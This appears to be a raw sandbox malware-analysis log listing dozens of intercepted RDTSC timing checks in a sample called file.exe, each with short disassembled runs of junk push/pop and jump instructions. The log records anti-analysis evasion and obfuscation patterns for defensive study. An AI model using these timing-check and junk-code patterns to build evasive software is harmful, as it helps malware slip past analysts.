            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3FB949 second address: 3FB965 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F2E7D1D343Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007F2E7D1D3436h 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3FB965 second address: 3FB9A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E7D257EC5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F2E7D257EBDh 0x00000010 js 00007F2E7D257ECFh 0x00000016 jmp 00007F2E7D257EC3h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3FB9A8 second address: 3FB9AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 494194 second address: 4941A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F2E7D257EB6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4945BD second address: 4945CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F2E7D1D343Ah 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4945CE second address: 4945D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4945D4 second address: 4945DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4945DA second address: 4945E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49AE4C second address: 49AE66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2E7D1D3446h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49AE66 second address: 49AE6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49AFDC second address: 49AFE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49AFE0 second address: 49AFF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jg 00007F2E7D257EBCh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49AFF0 second address: 49AFFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F2E7D1D343Eh 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49AFFE second address: 49B00F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F2E7D257EBAh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B2D8 second address: 49B2DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B2DC second address: 49B2E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B864 second address: 49B87F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2E7D1D3447h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B87F second address: 49B890 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jne 00007F2E7D257EB6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C104 second address: 49C114 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E7D1D343Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A2286 second address: 4A228E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A228E second address: 4A2294 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A50B6 second address: 4A50BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A50BE second address: 4A50D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 jg 00007F2E7D1D343Ah 0x0000000d popad 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A50D4 second address: 4A50E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007F2E7D257EB6h 0x0000000c popad 0x0000000d jbe 00007F2E7D257EBCh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A552E second address: 4A554E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2E7D1D3446h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b push ecx 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A56A6 second address: 4A56CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 push ebx 0x00000009 jmp 00007F2E7D257EC8h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A56CB second address: 4A56D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A582C second address: 4A5834 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A5C8B second address: 4A5C95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AD6C5 second address: 4AD6FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 jmp 00007F2E7D257EC5h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F2E7D257EC6h 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ABCD9 second address: 4ABCFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E7D1D3441h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jno 00007F2E7D1D3436h 0x00000010 je 00007F2E7D1D3436h 0x00000016 push edi 0x00000017 pop edi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ABE6A second address: 4ABE96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E7D257EC1h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F2E7D257EC3h 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC306 second address: 4AC31D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2E7D1D3442h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC581 second address: 4AC594 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 jmp 00007F2E7D257EBCh 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B48CF second address: 4B48FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E7D1D3442h 0x00000007 jmp 00007F2E7D1D3447h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B48FC second address: 4B494C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F2E7D257EB6h 0x00000009 jmp 00007F2E7D257EC5h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 jmp 00007F2E7D257EC8h 0x00000015 popad 0x00000016 jmp 00007F2E7D257EBAh 0x0000001b pop edx 0x0000001c pop eax 0x0000001d jp 00007F2E7D257EC0h 0x00000023 pushad 0x00000024 pushad 0x00000025 popad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B60A5 second address: 4B60A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B60A9 second address: 4B60AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B60AF second address: 4B60B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B60B5 second address: 4B60CF instructions: 0x00000000 rdtsc 0x00000002 jc 00007F2E7D257EB6h 0x00000008 jmp 00007F2E7D257EBDh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B9040 second address: 4B906B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F2E7D1D3447h 0x0000000d jg 00007F2E7D1D343Ch 0x00000013 jl 00007F2E7D1D3436h 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B906B second address: 4B907E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E7D257EBEh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C7A0F second address: 4C7A30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2E7D1D3449h 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C7A30 second address: 4C7A36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C7A36 second address: 4C7A3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C7A3A second address: 4C7A63 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E7D257EC4h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c js 00007F2E7D257EB6h 0x00000012 jng 00007F2E7D257EB6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C7A63 second address: 4C7A7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F2E7D1D343Dh 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C7A7A second address: 4C7A92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2E7D257EC3h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C75AE second address: 4C75B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC15A second address: 4CC173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F2E7D257EB6h 0x0000000a pushad 0x0000000b jnc 00007F2E7D257EB6h 0x00000011 jbe 00007F2E7D257EB6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC173 second address: 4CC178 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CBD12 second address: 4CBD16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CBD16 second address: 4CBD3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2E7D1D343Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F2E7D1D3441h 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CBE9B second address: 4CBEB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E7D257EC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CBEB8 second address: 4CBECC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E7D1D343Fh 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D83F8 second address: 4D83FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D8285 second address: 4D8289 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D8289 second address: 4D8299 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007F2E7D257EC2h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DEF1B second address: 4DEF28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DEF28 second address: 4DEF34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DEF34 second address: 4DEF3A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DEF3A second address: 4DEF4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 jc 00007F2E7D257EB6h 0x0000000d popad 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF09C second address: 4DF0BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F2E7D1D3444h 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF0BE second address: 4DF0DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E7D257EC8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF247 second address: 4DF254 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pop edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF517 second address: 4DF540 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F2E7D257EB6h 0x0000000a jne 00007F2E7D257EB6h 0x00000010 popad 0x00000011 jmp 00007F2E7D257EC8h 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF540 second address: 4DF55D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jno 00007F2E7D1D3436h 0x0000000b push esi 0x0000000c pop esi 0x0000000d popad 0x0000000e push ebx 0x0000000f jmp 00007F2E7D1D343Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E02AF second address: 4E02C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2E7D257EBEh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E02C1 second address: 4E02C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E344C second address: 4E3486 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2E7D257EBEh 0x00000008 pushad 0x00000009 jmp 00007F2E7D257EBDh 0x0000000e jmp 00007F2E7D257EBCh 0x00000013 jmp 00007F2E7D257EBEh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E3486 second address: 4E34AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 js 00007F2E7D1D3470h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F2E7D1D3445h 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E34AC second address: 4E34B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E514D second address: 4E5164 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push edx 0x00000007 pop edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a popad 0x0000000b jmp 00007F2E7D1D343Ch 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E5164 second address: 4E516A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F6A01 second address: 4F6A05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F6A05 second address: 4F6A09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F6895 second address: 4F689A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 504A67 second address: 504A6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 504A6B second address: 504A71 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5191EE second address: 5191F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 518145 second address: 51814B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51814B second address: 51814F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51814F second address: 518155 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5183EA second address: 5183EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5183EE second address: 518406 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E7D1D343Eh 0x00000007 js 00007F2E7D1D3436h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 518406 second address: 518421 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2E7D257EC7h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51895A second address: 518964 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 518964 second address: 518968 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 518BF9 second address: 518BFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 518BFF second address: 518C0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F2E7D257EB6h 0x0000000a popad 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 518C0A second address: 518C45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E7D1D343Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F2E7D1D3449h 0x00000011 pushad 0x00000012 popad 0x00000013 push edx 0x00000014 pop edx 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a jnp 00007F2E7D1D3436h 0x00000020 push edi 0x00000021 pop edi 0x00000022 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 518C45 second address: 518C4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 518C4B second address: 518C5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a jng 00007F2E7D1D343Eh 0x00000010 push edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 518DC9 second address: 518DD7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F2E7D257ED2h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51BE13 second address: 51BE18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51BE18 second address: 51BE1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51BECB second address: 51BED1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51C18B second address: 51C18F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51C18F second address: 51C198 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
